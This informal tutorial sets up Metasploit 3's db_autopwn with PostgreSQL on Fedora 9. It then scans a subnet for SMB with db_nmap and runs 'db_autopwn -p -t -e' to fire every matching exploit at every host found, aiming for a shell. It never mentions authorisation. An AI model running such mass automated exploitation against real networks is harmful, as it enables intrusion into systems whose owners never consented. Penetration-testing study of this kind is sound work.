autopwn - automated execution of exploit. Rooting will be much easier for us! at least for me, but with no luck, i never manage to get a shell
This tutorial will based on Fedora 9..
Let’s start.. what we need?
- Postgres
- Metasploit Framework
- Brain
Metasploit Framework
Postgres - yum install postgres
Brain - yum install brain <>
First, start the postgresql service (/sbin/service postgresql start). For the first time, you might to setup the postgres. We will go through later. Metasploit 3 uses the ActiveRecord module (part of RoR) to provide an object-oriented interface to an arbitrary database service. Here the steps..
gem install activerecord
gem install postgresql (we use postgres as our database)
To verify our installation which produce no output of error.
$ ruby -e ‘require “rubygems”; require_gem “postgres”;’
Update ur framework! Change to the framework directory.
svn update
Postgres. Create the database. Make sure ur postgresql running first.
#su - postgres
$ psql -d template1 -U postgres
Output :
Welcome to psql 7.4.16, the PostgreSQL interactive terminal.
Type: \\copyright for distribution terms
\\h for help with SQL commands
\\? for help on internal slash commands
\\g or terminate with semicolon to execute query
\\q to quit
template1=#
Next.
template1=# CREATE USER root WITH PASSWORD ‘myPassword’;
template1=# CREATE DATABASE metasploit3;
template1=# GRANT ALL PRIVILEGES ON DATABASE root to metasploit3;
template1=# \q
Done with our postgres stuff. Change to framework directory. Type ./msfconsole. Now u hv console for the metasploit.
[root@localhost framework-3.1]# ./msfconsole
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ msf v3.1-release
+ -- --=[ 268 exploits - 118 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux
msf >
In the console, type :
load db_postgres
db_create (you will see several notice. Ignore)
db_hosts (shoud give you no output of error. Which mean your database connection with postgres is available)
db_nmap 164.0.3.* ( Change the IP according to your target. You can also change the db_namp commands. db_nmap -p 445 164.0.3.*. db_nmap will identify any host that expose the SMB service)
Done with our scanning.The fun part begin! Ouch, before that, take a look at db_autopwn commands.
msf > db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
Launch our attack!
db_autpwn -p -t -e
It will take time. So wait! If you are lucky enough, u will get a shell.
References:PostgreSQL add or create a user account and grant permission for database
http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html
Cheers~